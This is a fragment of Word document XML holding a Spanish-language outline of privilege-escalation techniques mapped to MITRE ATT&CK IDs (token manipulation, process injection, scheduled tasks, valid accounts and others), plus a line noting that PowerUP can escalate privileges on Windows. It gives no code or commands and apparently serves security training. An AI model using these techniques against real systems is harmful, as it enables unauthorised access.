        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId239">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Mecanismo de Control de Elevación de Abuso</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:hyperlink r:id="rId240">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1548</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E9FE69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="91"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId241">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Manipulación de tokens de acceso</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId242">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1134</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-21"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1A668" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId243">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Ejecución de inicio automático de arranque o inicio de sesión</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId244">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1547</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9E0B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId245">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Scripts de inicialización de inicio de sesión o arranque</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId246">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1037</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D91FB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId247">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Crear o modificar un proceso del sistema</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId248">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1543</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B6466A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId249">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Ejecución desencadenada por eventos</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-22"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId250">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1546</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8307E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId251">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Explotación para la Escalada de Privilegios</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId252">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1068</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C291F66" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId253">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Inyección de proceso</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId254">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1055</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A66CCA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId255">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Tarea/Trabajo Programado</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId256">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1053</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-22"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA847F7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2436"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2436" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId257">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t xml:space="preserve">Cuentas </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Válidas[</w:t>
      </w:r>
      <w:hyperlink r:id="rId258">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1078</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DDAC9D"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399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1033F3BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1129"/>
        </w:tabs>
        <w:spacing w:before="59"/>
        <w:ind w:left="1129" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId259">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>PowerUP</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>se puede usar para escalar localmente en un entorno de Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A079A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A28166" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
